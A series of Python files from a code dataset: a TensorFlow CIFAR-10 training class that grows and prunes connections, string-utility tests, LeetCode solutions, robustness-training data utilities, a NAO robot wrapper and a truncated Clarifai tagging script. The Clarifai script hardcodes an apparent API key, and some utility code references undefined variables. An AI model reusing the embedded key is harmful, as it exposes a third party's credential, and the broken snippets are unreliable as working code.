net_eval(self, x, weights, msk, biases, train_phase):\n\t\tx = tf.reshape(x, shape=[-1, 32, 32, 3])\n\t\tx3 = alexnet_cifar10(x, weights, msk, biases, train_phase)\n\t\treturn x3\n\n\tdef net(self, x, weights, msk, biases, train_phase):\n\t\tx = tf.reshape(x, shape=[-1, 32, 32, 3])\n\t\tx3 = alexnet_cifar10(x, weights, msk, biases, train_phase)\n\t\treturn x3\n\n\tdef eval_validation(self):\n\t\tcost = np.zeros(20)\n\t\terrcl = np.zeros(20)\n\t\ti = 0\n\t\tfor x_vali, y_vali in self.vali_datagen.flow(self.x_test, self.y_test, batch_size=self.valbatchsize, shuffle=False):\n\t\t\tcost[i], errcl[i] = self.sess.run([self.cost_eval, self.errorrate_eval], \n\t\t\t\tfeed_dict={self.x: x_vali, self.y: y_vali, self.lrate:self.eta, self.train_phase: False})\n\t\t\ti += 1\n\t\t\tif i == 19:\n\t\t\t\tbreak\n\t\treturn cost.mean(), errcl.mean()\n\n\tdef initStruct(self, load=False):\n\t\tprint('Structure and TF initializing')\n\t\tself.i0 = 32\n\t\tself.c1 = 64\n\t\tself.c2 = 64\n\t\tself.n0 = 1600\n\t\tself.n1, self.N1 = 512, 512\n\t\tself.n2, self.N2 = 256, 256\n\t\tself.n3 = 10\n\t\tself.n4 = 10\n\n\t\tself.ntotal = self.n1 + self.n2\n\n\t\tself.n1_addProb = ( self.n0*self.n1 / pow((self.n1 + self.n2), 2.))\n\t\tself.n2_addProb = ( self.n0*self.n2 / pow((self.n1 + self.n2), 2.))\n\t\tmax_prob = max(self.n1_addProb, self.n2_addProb)\n\t\tself.n1_addProb /= max_prob\n\t\tself.n2_addProb /= max_prob\n\t\tprint('n1_addProb: ', self.n1_addProb)\n\t\tprint('n2_addProb: ', self.n2_addProb)\n\n\t\tself.sess = tf.InteractiveSession()\n\n\t\tself.info = 'Dataset: CIFAR10\\nLayer info:\\n' + str(self.n0) + '*' + str(self.n1) + '*'+ str(self.n2) + '*' + str(self.n3) + '\\n'\n\n\t\tself.msk = {\n\t\t\t'm1': tf.Variable(rRangedMask(self.n0, self.n1, self.n0, self.N1, percent=1.), trainable=False, dtype=tf.float32, name='m1'),\n\t\t\t'm2': tf.Variable(rRangedMask(self.n1, self.n2, self.N1, self.N2, percent=1.), trainable=False, dtype=tf.float32, name='m2'),\n\t\t\t'm3': tf.Variable(rRangedMask(self.n2, self.n3, self.N2, self.n3, percent=1.), trainable=False, dtype=tf.float32, name='m3'),\n\t\t\t}\n\t\tself.weights = {\n\t\t\t'cw1': tf.Variable(tf.random_normal([5, 5, 3, 64], stddev=self.epsinit), name='cw1'),\n\t\t\t'cw2': tf.Variable(tf.random_normal([5, 5, 64, 64], stddev=self.epsinit), name='cw2'),\n\t\t\t'w1': tf.Variable(tf.multiply(tf.random_normal([self.n0, self.N1], stddev=self.epsinit), self.msk['m1'].initialized_value()), name='w1'),\n\t\t\t'w2': tf.Variable(tf.multiply(tf.random_normal([self.N1, self.N2], stddev=self.epsinit), self.msk['m2'].initialized_value()), name='w2'),\n\t\t\t'w3': tf.Variable(tf.multiply(tf.random_normal([self.N2, self.n3], stddev=self.epsinit), self.msk['m3'].initialized_value()), name='w3'),\n\t\t\t'w02': tf.Variable(tf.zeros([self.n0, self.N2]), name='w02'),\n\t\t\t'w13': tf.Variable(tf.zeros([self.N1, self.n3]), name='w13'),\n\t\t\t}\n\t\tself.biases = {\n\t\t\t'cb1': tf.Variable(tf.zeros([64]), name='cb1'),\n\t\t\t'cb2': tf.Variable(tf.zeros([64]), name='cb2'),\n\t\t\t'b1': tf.Variable(tf.zeros([self.N1]), name='b1'),\n\t\t\t'b2': tf.Variable(tf.zeros([self.N2]), name='b2'),\n\t\t\t'b3': tf.Variable(tf.zeros([self.n3]), name='b3'),\n\t\t\t}\n\n\t\tself.saver = tf.train.Saver()\n\t\tself.save_path = '/home/xdai/Desktop/model_saved/model.ckpt'\n\n\t\t# input and output\n\t\tself.x = tf.placeholder(tf.uint8, [self.n0].insert(0, None))\n\t\tself.y = tf.placeholder(tf.uint8, [None, self.n4])\n\n\t\tself.train_phase = tf.placeholder(tf.bool, shape=[])\n\t\tself.lrate = tf.placeholder(tf.float32, shape=[])\n\n\t\t# main MLP strcutre optimizer\n\t\tself.pred = self.net(self.x, self.weights, self.msk, self.biases, self.train_phase)\n\t\tself.cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.pred, labels=self.y))\n\t\tself.regularizer = tf.nn.l2_loss(self.weights['w1']) + \\\n\t\t\t\t\t\t\ttf.nn.l2_loss(self.weights['w2']) + \\\n\t\t\t\t\t\t\ttf.nn.l2_loss(self.weights['w3']) + \\\n\t\t\t\t\t\t\ttf.nn.l2_loss(self.weights['cw1']) + \\\n\t\t\t\t\t\t\ttf.nn.l2_loss(self.weights['cw2'])\n\t\tself.cost = tf.reduce_mean(self.cost + self.beta*self.regularizer)\n\t\tself.optimizer = tf.train.MomentumOptimizer(learning_rate=self.lrate, momentum=0.2).minimize(self.cost)\n\t\tself.err_pred = tf.not_equal(tf.argmax(self.pred, 1), tf.argmax(self.y, 1))\n\t\tself.errorrate = tf.reduce_mean(tf.cast(self.err_pred, tf.float32))\n\n\t\tself.pred_eval = self.net_eval(self.x, self.weights, self.msk, self.biases, self.train_phase)\n\t\tself.cost_eval = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.pred_eval, labels=self.y))\n\t\tself.err_pred_eval = tf.not_equal(tf.argmax(self.pred_eval, 1), tf.argmax(self.y, 1))\n\t\tself.errorrate_eval = tf.reduce_mean(tf.cast(self.err_pred_eval, tf.float32))\n\n\t\t# gradient computation network\n\t\t# self.pred_full = self.net_full(self.x, self.weights, self.biases)\n\t\t# self.cost_full = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=self.pred_full, labels=self.y))\n\t\t# self.gradient = tf.train.GradientDescentOptimizer(learning_rate=0.01).compute_gradients(self.cost_full)\n\n\t\t# initialization\n\t\tif load == True:\n\t\t\tinit = tf.global_variables_initializer()\n\t\t\tself.sess.run(init)\n\t\t\tself.saver.restore(self.sess, self.save_path)\n\t\t\tprint(\"Load = True, Model Restored! \")\n\t\telse:\n\t\t\tinit = tf.global_variables_initializer()\n\t\t\tself.sess.run(init)\n\t\t\tprint(\"Load = False, TF Variable Initialized! \")\n\n\t\tself.errsq = np.zeros(self.tshow)\n\t\tself.errcl = np.zeros(self.tshow)\n\n\t\tself.errcltrain = np.zeros(self.tmax//self.tshow)\n\t\tself.errsqtrain = np.zeros(self.tmax//self.tshow)\n\t\tself.errclvalidate = np.ones(self.tmax//self.tshow)\n\n\t\tself.displayBoard = six_figures(show = True)\n\n\t\tprint('Initialization Complete!')\n\t\treturn self.ntotal\n\n\tdef learn(self, t_train):\n\t\tt = self.tnow\n\t\t#for t in xrange(self.tnow, self.tnow + t_train):\n\t\twhile t < (self.tnow + t_train):\n\t\t\t#x_batch, y_batch = self.cifar_data.train.next_batch(self.batchsize)\n\t\t\tfor x_batch, y_batch in self.train_datagen.flow(self.x_train, self.y_train, batch_size=self.batchsize):\n\t\t\t\tself.errsq[t%self.tshow], self.errcl[t%self.tshow] = self.sess.run([self.cost_eval, self.errorrate_eval], \n\t\t\t\t\tfeed_dict={self.x: x_batch, self.y: y_batch, self.lrate:self.eta, self.train_phase: True})\n\t\t\t\tself.sess.run(self.optimizer, \n\t\t\t\t\tfeed_dict={self.x: x_batch, self.y: y_batch, self.lrate:self.eta, self.train_phase: True})\n\t\t\t\t\n\t\t\t\tt += 1\n\t\t\t\tif (t % self.tshow == 0 and t > 0) or t > (self.tnow + t_train):\n\t\t\t\t\tbreak\n\n\t\t\tself.eta *= 0.997\n\t\t\tmonitor = []\n\t\t\tself.train_error = np.sum(self.errcl) / self.tshow\n\t\t\tself.train_sqerror = np.sum(self.errsq) / self.tshow\n\t\t\t_, self.errclvalidate[t//self.tshow - 1] = self.eval_validation()\n\n\t\t\tprint ('current iteration: ', t)\n\t\t\tprint ('current time: ', time.time() - self.t0)\n\t\t\tprint ('current train_error: ', self.train_error)\n\t\t\tprint ('current vali_error: ', self.errclvalidate[t//self.tshow - 1])\n\n\t\t\tself.errcltrain[t//self.tshow - 1] = self.train_error\n\t\t\tself.errsqtrain[t//self.tshow - 1] = self.train_sqerror\n\n\t\t\tinfo = self.info + 'eta: %.3f \\ntime:%.2f \\n%d, %d, %d, %d' \\\n\t\t\t%(self.eta, time.time() - self.t0, self.n0, self.n1, self.n2, self.n3)\n\t\t\tself.displayBoard.draw(idx=0, mode='text', data=info)\n\n\t\t\tw = np.sign(np.absolute(self.sess.run(self.weights['w1'])))\n\t\t\tself.displayBoard.draw(idx=1, mode='imshow', data=w, title=str(np.count_nonzero(w)))\n\t\t\tmonitor.append(np.count_nonzero(w))\n\n\t\t\tw = np.sign(np.absolute(self.sess.run(self.weights['w2'])))\n\t\t\tself.displayBoard.draw(idx=2, mode='imshow', data=w, title=str(np.count_nonzero(w)))\n\t\t\tmonitor.append(np.count_nonzero(w))\n\n\t\t\tw = np.sign(np.absolute(self.sess.run(self.weights['w3'])))\n\t\t\tself.displayBoard.draw(idx=3, mode='imshow', data=w, title=str(np.count_nonzero(w)))\n\t\t\tmonitor.append(np.count_nonzero(w))\n\n\t\t\tm1 = self.msk['m1'].eval()\n\t\t\tm2 = self.msk['m2'].eval()\n\t\t\tmonitor.append(self.N1 + self.N2 - empty_count(m1.T) - empty_count(m2.T))\n\n\t\t\tself.monitor.append(monitor)\n\t\t\tself.displayBoard.draw(idx=4, mode='curve', data=np.array(self.monitor)[:, 0], title='num of conn')\n\n\t\t\tself.displayBoard.draw(idx=5, mode='twocurve', data=self.errcltrain[: t//self.tshow], title=str(t), data2=self.errclvalidate[: t//self.tshow], )\t\n\t\t\tself.displayBoard.display()\n\n\t\t\tgc.collect()\n\n\t\t\tif self.errclvalidate[t//self.tshow - 1] < self.record:\n\t\t\t\tself.record = self.errclvalidate[t//self.tshow - 1]\n\t\t\t\tsave = self.saver.save(self.sess, self.save_path)\n\t\t\t\tprint(('Model saved in file: %s' %save))\n\t\t\t\n\t\t\tprint('Current record: ', self.record)\n\t\t\tprint ('\\n')\n\t\tself.tnow += t_train\n\t\tself.displayBoard.save()\n\t\treturn self.record, self.train_error\n\n\tdef minibatchGradient(self, x, y):\n\t\t_gradient = self.sess.run(self.gradient, feed_dict={self.x: x, self.y: y})\n\t\treturn [-np.array(_gradient[2][0]),\n\t\t\t\t-np.array(_gradient[3][0]),\n\t\t\t\t-np.array(_gradient[4][0]),\n\t\t\t\t-np.array(_gradient[5][0]),\n\t\t\t\t-np.array(_gradient[6][0])\n\t\t\t\t]\n\n\tdef computeGradient(self):\n\t\tprint('Computing Gradient...')\n\t\t_batch = 600\n\t\tgrdwd1 = np.zeros([self.n0, self.N1])\n\t\tgrdwd2 = np.zeros([self.N1, self.N2])\n\t\tgrdwd3 = np.zeros([self.N2, self.n3])\n\t\tgrdwd02 = np.zeros([self.n0, self.N2])\n\t\tgrdwd13 = np.zeros([self.N1, self.n3])\n\t\t_total_iter = int(self.mtrain / _batch)\n\n\t\tprint('Batch size: ', _batch)\n\t\tprint('Total iteration: ', _total_iter)\n\n\t\tfor i in range (_total_iter):\n\t\t\t_start = i * _batch\n\t\t\t_end = (i+1) * _batch\n\t\t\t_gradient = self.minibatchGradient(self.x_train[_start:_end], self.y_train[_start:_end])\n\t\t\tgrdwd1 += _gradient[0]\n\t\t\tgrdwd2 += _gradient[1]\n\t\t\tgrdwd3 += _gradient[2]\n\t\t\tgrdwd02 += _gradient[3]\n\t\t\tgrdwd13 += _gradient[4]\n\n\t\tgrdwd1 /= float(_total_iter)\n\t\tgrdwd2 /= float(_total_iter)\n\t\tgrdwd3 /= float(_total_iter)\n\t\tgrdwd02 /= float(_total_iter)\n\t\tgrdwd13 /= float(_total_iter)\n\n\t\treturn [grdwd1, grdwd2, grdwd3, grdwd02, grdwd13]\n\n\tdef computeLossFunc(self):\t\n\t\tcost, err = self.sess.run([self.cost, self.errorrate], feed_dict={self.x: self.x_train[:self.mtrain_raw], self.y: self.y_train[:self.mtrain_raw]})\n\t\tprint('Loss func: ', cost)\n\t\tprint('Train error: ', err)\n\t\treturn cost\n\n\tdef addNeuron(self):\n\t\tself.computeLossFunc()\n\t\tGradient = self.computeGradient()\n\n\t\tgrdwd1 = np.array(Gradient[0])[:self.n0, :self.n1]\n\t\tgrdwd2 = np.array(Gradient[1])[:self.n1, :self.n2]\n\t\tgrdwd3 = np.array(Gradient[2])[:self.n2, :self.n3]\n\t\tgrdwd02 = np.array(Gradient[3])[:self.n0, :self.n2]\n\t\tgrdwd13 = np.array(Gradient[4])[:self.n1, :self.n3]\n\t\t\t\t\t\t\t\t\t\n\t\tmatw1 = self.weights['w1'].eval()\n\t\tmatw2 = self.weights['w2'].eval()\n\t\tmatw3 = self.weights['w3'].eval()\n\n\t\tmatm1 = self.msk['m1'].eval()\n\t\tmatm2 = self.msk['m2'].eval()\n\t\tmatm3 = self.msk['m3'].eval()\n\n\t\tavew1 = np.sum(np.absolute(matw1)) / np.count_nonzero(matm1) # TBD: n0*n1 or count_non_zero\n\t\tavew2 = np.sum(np.absolute(matw2)) / np.count_nonzero(matm2)\n\t\tavew3 = np.sum(np.absolute(matw3)) / np.count_nonzero(matm3)\t\n\n\t\tif np.random.rand() <= 1.:\n\t\t\tratio = 0.12\n\n\t\t\tthreshold = np.percentile(np.absolute(grdwd02), (1-ratio)*100)\n\t\t\tgrdwd02_filt = np.multiply(np.round(0.5*np.sign(np.absolute(grdwd02)-threshold) + 0.5), grdwd02)\t\n\n\t\t\tgrdwd02_ssf = np.multiply(np.sign(grdwd02_filt), np.sqrt(np.absolute(grdwd02_filt))) # signed,sqrted,filtered\n\n\t\t\t#sign_msk = np.sign(np.sign(dRdu2) + 0.1) # remove '0' sign\n\t\t\tsign_msk = np.sign(np.sign(np.random.randn(self.n2)) + 0.1)\n\n\t\t\tout_conn = np.sum(np.multiply(grdwd02_ssf, sign_msk), axis=0) # +- depends on avg.dRdu2\n\t\t\tin_conn = np.sum(np.multiply(grdwd02_ssf, np.sign(out_conn)), axis=1)\n\t\t\t\n\t\t\tout_conn = avew2*out_conn/(np.absolute(out_conn)).mean()\n\t\t\tin_conn = avew1*in_conn/(np.absolute(in_conn)).mean()\n\n\t\t\tmatw1[:, self.n1] = in_conn\n\t\t\tmatw2[self.n1, :self.n2] = out_conn\n\t\n\t\t\tmatm1[:, self.n1] = np.sign(np.absolute(in_conn))\n\t\t\tmatm2[self.n1, :self.n2] = np.sign(np.absolute(out_conn))\n\n\t\t\tself.n1 += 1\n\n\t\tif np.random.rand() <= 1.:\n\t\t\tratio = 0.20\n\n\t\t\tthreshold = np.percentile(np.absolute(grdwd13), (1-ratio)*100)\n\t\t\tgrdwd13_filt = np.multiply(np.round(0.5*np.sign(np.absolute(grdwd13)-threshold) + 0.5), grdwd13)\t\n\n\t\t\tgrdwd13_ssf = np.multiply(np.sign(grdwd13_filt), np.sqrt(np.absolute(grdwd13_filt)))\n\t\t\t\n\t\t\t#sign_msk = np.sign(np.sign(dRdu3) + 0.1) # remove '0' sign\n\t\t\tsign_msk = np.sign(np.sign(np.random.randn(self.n3)) + 0.1)\n\n\t\t\tout_conn = np.sum(np.multiply(grdwd13_ssf, sign_msk), axis=0) # +- depends on avg.dRdu2\n\t\t\tin_conn = np.sum(np.multiply(grdwd13_ssf, np.sign(out_conn)), axis=1)\n\t\t\t\n\t\t\tout_conn = avew3*out_conn/(np.absolute(out_conn)).mean()\n\t\t\tin_conn = avew2*in_conn/(np.absolute(in_conn)).mean()\n\n\t\t\tmatw2[:len(in_conn), self.n2] = in_conn\n\t\t\tmatw3[self.n2, :self.n3] = out_conn\n\t\n\t\t\tmatm2[:len(in_conn), self.n2] = np.sign(np.absolute(in_conn))\n\t\t\tmatm3[self.n2, :self.n3] = np.sign(np.absolute(out_conn))\n\n\t\t\tself.n2 += 1\n\n\t\tassign1 = self.msk['m1'].assign(matm1)\n\t\tassign2 = self.msk['m2'].assign(matm2)\n\t\tassign3 = self.msk['m3'].assign(matm3)\n\n\t\tself.sess.run(assign1)\n\t\tself.sess.run(assign2)\n\t\tself.sess.run(assign3)\n\n\t\tassign1 = self.weights['w1'].assign(matw1)\n\t\tassign2 = self.weights['w2'].assign(matw2)\n\t\tassign3 = self.weights['w3'].assign(matw3)\n\n\t\tself.sess.run(assign1)\n\t\tself.sess.run(assign2)\n\t\tself.sess.run(assign3)\n\n\t\tself.computeLossFunc()\n\n\t\tprint('\\n')\n\n\tdef addConn(self, addRatio):\n\t\tkey_m = ['m1', 'm2', 'm3']\n\t\tw_size = [self.n0 * self.n1, self.n1 * self.n2, self.n2 * self.n3]\n\n\t\tGradient = self.computeGradient()\n\n\t\tfor i in range (len(key_m)):\n\t\t\tgrdw = np.absolute(np.array(Gradient[i]))\n\t\t\tmatm = self.msk[key_m[i]].eval()\n\n\t\t\tmin_conn = addRatio[i]*w_size[i]\n\t\t\tthreshold = np.partition(grdw.flatten(), -int(min_conn))[-int(min_conn)]\n\t\t\tif threshold == 0:\n\t\t\t\tprint('Warning: threshold for conn adding is 0! ')\n\t\t\tmatm = np.sign(np.round(0.5*np.sign(np.subtract(grdw, threshold)) + 0.5) + matm)\n\n\t\t\tassign = self.msk[key_m[i]].assign(matm)\n\t\t\tself.sess.run(assign)\n\n\tdef rmConn(self, ratio=[0. for i in range (5)]):\n\t\tkey_m = ['m1', 'm2', 'm3']\n\t\tkey_w = ['w1', 'w2', 'w3']\n\n\t\tfor i in range (len(key_m)):\n\t\t\tmatw = self.weights[key_w[i]].eval()\n\n\t\t\t_index = ratio[i]*np.count_nonzero(matw)\n\t\t\tthreshold = np.partition( np.absolute(matw).flatten(), -int(_index) )[-int(_index)]\n\t\t\tif threshold == 0:\n\t\t\t\tprint('Warning: threshold for rm adding is 0! ')\n\t\t\tmatm = np.round(0.5*np.sign(np.absolute(matw)-threshold) + 0.5)\n\t\t\tmatw = np.multiply(matm, matw)\n\n\t\t\tassign = self.weights[key_w[i]].assign(matw)\n\t\t\tself.sess.run(assign)\n\n\t\t\tassign = self.msk[key_m[i]].assign(matm)\n\t\t\tself.sess.run(assign)\n\n\tdef show_monitor(self):\n\t\tprint(self.monitor)\n\nif __name__ == '__main__':\n\ttf_model = tf_classifier()\n\ttf_model.setData()\n\ttotal_neuron = tf_model.initStruct(load=False)\t\n\tfor i in range (100):\n\t\ttf_model.learn(100000)\n\ttf_model.show_monitor()\n","sub_path":"alexnet_cifar10_keras.py","file_name":"alexnet_cifar10_keras.py","file_ext":"py","file_size_in_byte":17915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"532820345","text":"# -*- coding: utf-8 -*-\n#\n# Copyright 2015 Alexandre Villela (SleX) \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n#\n# by sx.slex@gmail.com\n\nimport unittest\nfrom sxtools import string_utils\n\n\nclass TestStringUtils(unittest.TestCase):\n\n def test_capitalize_name_1(self):\n self.assertEqual(\n string_utils.capitalize_name(u'BRASÍLIA'),\n u'Brasília'\n )\n\n def test_capitalize_name_2(self):\n self.assertEqual(\n string_utils.capitalize_name(u'BRASÍLIA/PLANO PILOTO'),\n u'Brasília/Plano Piloto'\n )\n\n def test_capitalize_name_3(self):\n self.assertEqual(\n string_utils.capitalize_name(u'joão paulo ii'),\n u'João Paulo II'\n )\n\n def test_capitalize_name_4(self):\n self.assertEqual(\n string_utils.capitalize_name(''),\n u''\n )\n\n def test_to_unicode_str(self):\n self.assertEqual(\n string_utils.to_unicode('BRASILIA/PLANO PILOTO'),\n u'BRASILIA/PLANO PILOTO'\n )\n\n def test_to_unicode_list(self):\n self.assertListEqual(\n string_utils.to_unicode(\n ['BRASILIA/PLANO PILOTO', 1, True, 'Bolas']\n ),\n [u'BRASILIA/PLANO PILOTO', 1, True, u'Bolas']\n )\n\n def test_to_unicode_dict(self):\n self.assertDictEqual(\n string_utils.to_unicode(\n dict(name='BRASILIA/PLANO PILOTO', idade=1, sport='Tenis')\n ),\n dict(name=u'BRASILIA/PLANO PILOTO', idade=1, sport=u'Tenis')\n )\n\n def test_to_unicode_latin(self):\n self.assertEquals(\n string_utils.to_unicode(\n 'Ol\\xe1'\n ),\n u'Olá'\n )\n","sub_path":"tests/test_string_utils.py","file_name":"test_string_utils.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"10798200","text":"__author__ = 'jayvee'\n\n\nclass Solution(object):\n def setZeroes(self, matrix):\n \"\"\"\n :type matrix: List[List[int]]\n :rtype: void Do not return anything, modify matrix in-place instead.\n \"\"\"\n first_row_has_zero = not all(matrix[0])\n first_col_has_zero = not all([matrix[i][0] for i in range(len(matrix))])\n for i in xrange(1, len(matrix)):\n for j in xrange(1, len(matrix[0])):\n if matrix[i][j] == 0:\n matrix[0][j] = 0\n matrix[i][0] = 0\n # set values\n for i in xrange(1, len(matrix)):\n for j in xrange(1, len(matrix[0])):\n if matrix[0][j] == 0 or matrix[i][0] == 0:\n matrix[i][j] = 0\n if first_row_has_zero:\n matrix[0] = [0] * len(matrix[0])\n if first_col_has_zero:\n for i in xrange(0, len(matrix)):\n matrix[i][0] = 0\n","sub_path":"python/Set Matrix Zeroes.py","file_name":"Set Matrix Zeroes.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"137358724","text":"#51. N-Queens\r\n# Time Complexity : O(n!)\r\n# Space Complexity : O(n x n) \r\n# Did this code successfully run on Leetcode : Yes\r\n# Any problem you faced while coding this : No\r\nclass Solution:\r\n result = None\r\n board = None \r\n def solveNQueens(self, n: int) -> List[List[str]]:\r\n if not n :\r\n return []\r\n self.result = []\r\n self.m = n\r\n self.board = [[0 for _ in range(n)] for _ in range(n)]\r\n self.backtrack(0)\r\n return self.result\r\n def backtrack(self,indx):\r\n #base\r\n if indx == len(self.board):\r\n li = []\r\n for i in range(len(self.board)):\r\n st = ''\r\n for j in range(len(self.board[0])):\r\n if self.board[i][j] == 0:\r\n st += '.'\r\n else:\r\n st += 'Q'\r\n li.append(st)\r\n self.result.append(li)\r\n #logic\r\n for i in range(len(self.board[0])):\r\n if self.isSafe(indx,i):\r\n #action\r\n self.board[indx][i] = 1\r\n #recurse\r\n self.backtrack(indx+1)\r\n self.board[indx][i] = 0\r\n \r\n \r\n def isSafe(self,r,c):\r\n #above col\r\n for i in range(len(self.board)):\r\n if self.board[i][c] == 1:\r\n return False\r\n #daig left\r\n i = r - 1\r\n j = c - 1\r\n while i >= 0 and j >= 0:\r\n if self.board[i][j] == 1:\r\n return False\r\n i -= 1\r\n j -= 1\r\n \r\n \r\n #daig right\r\n i = r-1\r\n j = c+1\r\n while i >= 0 and j < len(self.board[0]):\r\n if self.board[i][j] == 1:\r\n return False\r\n i -= 1\r\n j += 1\r\n return True","sub_path":"solveNQueens.py","file_name":"solveNQueens.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"631944579","text":"# import apex.amp as amp\nimport torch\nimport torch.nn.functional as F\nfrom torchvision import datasets, transforms\nfrom torch.utils.data.sampler import SubsetRandomSampler\nimport numpy as np\n\ncifar10_mu_tup = (0.4914, 0.4822, 0.4465)\ncifar10_std_tup = (0.2471, 0.2435, 0.2616)\ncifar10_mu = torch.tensor(cifar10_mu_tup).view(3,1,1).cuda()\ncifar10_std = torch.tensor(cifar10_std_tup).view(3,1,1).cuda()\ncifar10_upper_limit = ((1 - cifar10_mu)/ cifar10_std)\ncifar10_lower_limit = ((0 - cifar10_mu)/ cifar10_std)\n\ncifar100_mu_tup = (0.507, 0.487, 0.441) \ncifar100_std_tup = (0.267, 0.256, 0.276)\ncifar100_mu = torch.tensor(cifar100_mu_tup).view(3,1,1).cuda()\ncifar100_std = torch.tensor(cifar100_std_tup).view(3,1,1).cuda()\ncifar100_upper_limit = ((1 - cifar100_mu)/ cifar100_std)\ncifar100_lower_limit = ((0 - cifar100_mu)/ cifar100_std)\n\ndef clamp(X, lower_limit, upper_limit):\n return torch.max(torch.min(X, upper_limit), lower_limit)\n\n\"\"\"\n Takes in a pytorch dataset object and returns train/test datasets after transformations\n\"\"\"\ndef applyDSTrans(config):\n train_transforms = []\n test_transforms = []\n \n dataset = config[\"dataset\"]\n if dataset == datasets.CIFAR10 or dataset==datasets.CIFAR100:\n for elt in [transforms.RandomCrop(32, padding=4), transforms.RandomHorizontalFlip()]:\n train_transforms.append(elt)\n \n# print(dataset)\n# print(dict(dataset))\n# print(dataset==datasets.CIFAR10)\n# print(\"mean:\", cifar10_mean)\n# print(\"std:\", cifar10_std)\n \n tens = transforms.ToTensor()\n train_transforms.append(tens)\n test_transforms.append(tens)\n \n print(cifar10_mu_tup, cifar10_std_tup)\n \n if dataset == datasets.CIFAR10 and config[\"training_method\"] != \"trades\" and not config.get('auto_attack', False):\n print(\"Normalized DS\")\n norm = transforms.Normalize(cifar10_mu_tup, cifar10_std_tup)\n train_transforms.append(norm)\n test_transforms.append(norm)\n\n if dataset == datasets.CIFAR100 and config[\"training_method\"] != \"trades\" and not config.get('auto_attack', False):\n print(\"Normalized DS\")\n norm = transforms.Normalize(cifar100_mu_tup, cifar100_std_tup)\n train_transforms.append(norm)\n test_transforms.append(norm)\n \n# assert(len(train_transforms) == 4)\n# assert(len(test_transforms) == 2)\n\n train_ds = dataset('./data', train=True, download=True, transform=transforms.Compose(train_transforms))\n test_ds = dataset('./data', train=False, download=True, transform=transforms.Compose(test_transforms))\n\n return train_ds, test_ds\n\ndef dataset_with_indices(cls):\n \"\"\"\n Modifies the given Dataset class to return a tuple data, target, index\n instead of just data, target.\n \"\"\"\n\n def __getitem__(self, index):\n data, target = cls.__getitem__(self, index)\n return data, target, index\n\n return type(cls.__name__, (cls,), {\n '__getitem__': __getitem__,\n })\n\ndef get_loaders(dir_, batch_size):\n train_transform = transforms.Compose([\n transforms.RandomCrop(32, padding=4),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n transforms.Normalize(cifar10_mean, cifar10_std),\n ])\n test_transform = transforms.Compose([\n transforms.ToTensor(),\n transforms.Normalize(cifar10_mean, cifar10_std),\n ])\n num_workers = 2\n train_dataset = datasets.CIFAR10(\n dir_, train=True, transform=train_transform, download=True)\n test_dataset = datasets.CIFAR10(\n dir_, train=False, transform=test_transform, download=True)\n train_loader = torch.utils.data.DataLoader(\n dataset=train_dataset,\n batch_size=batch_size,\n shuffle=True,\n pin_memory=True,\n num_workers=num_workers,\n )\n test_loader = torch.utils.data.DataLoader(\n dataset=test_dataset,\n batch_size=batch_size,\n shuffle=False,\n pin_memory=True,\n num_workers=2,\n )\n return train_loader, test_loader\n\nclass SnapshotEnsembleScheduler:\n def __init__(self, opt, T, M, a0):\n self.opt = opt\n self.T = T\n self.M = M\n self.t = 0\n self.lastLR = a0\n self.a0 = a0\n\n def step(self):\n self.t+=1\n newLR = self.a0/2*(np.cos((np.pi*((self.t - 1) % np.ceil(self.T/self.M)))/ np.ceil(self.T/self.M)) + 1)\n\n for g in self.opt.param_groups:\n g['lr'] = newLR\n\n self.lastLR = newLR\n\n\n def get_last_lr(self):\n return [self.lastLR]\n\n def snapshot(self):\n return self.t % np.ceil(self.T/self.M) == 0","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"312529537","text":"'''\nCreated on Feb 10, 2013\n\n@author: dsnowdon\n\nCode that has dependencies on the NAOqi framework\n'''\n\nfrom naoqi import ALProxy\n\n'''\nHold information about the NAO environment and provide abstraction for logging\n'''\nclass NaoEnvironment(object):\n def __init__(self, box_, memory_, motion_, tts_):\n super(NaoEnvironment, self).__init__()\n self.box = box_\n self.memory = memory_\n self.motion = motion_\n self.tts = tts_\n \n def log(self, msg):\n self.box.log(msg)\n\n'''\nCreate environment object.\nNeeds to be called from a process with an ALBroker running (for example\nwithin choreographe code)\n'''\ndef make_environment(box_):\n return NaoEnvironment(box_,\n ALProxy(\"ALMemory\"), \n ALProxy(\"ALMotion\"), \n ALProxy(\"ALTextToSpeech\"))","sub_path":"wanderer/src/main/python/util/naoutil.py","file_name":"naoutil.py","file_ext":"py","file_size_in_byte":853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"215430431","text":"from clarifai.rest import ClarifaiApp\nimport pandas as pd\nimport numpy as np\n\n# Global Variables\n# 10: ten folder\ntotal_photos_num_10 = 10\nimage_folder_path_10 = \"../static/images/ten/\"\nall_tags_filename_10 = \"../database_10.txt\"\n\n# 200: two hundred folder\ntotal_photos_num_200 = 200\nimage_folder_path_200 = \"../static/images/two_hundred/\"\nall_tags_filename_200 = \"../database_200.txt\"\n\nall_tags = []\n\n# Create clarifai model instance\napp = ClarifaiApp(api_key='1fc0e40ef28b4e3085522ee5857b1aee')\nmodel = app.public_models.general_model\n\ndef read_all_tags_and_save_as_local_file(total_photos_num, image_folder_path, model, all_tags_filename):\n 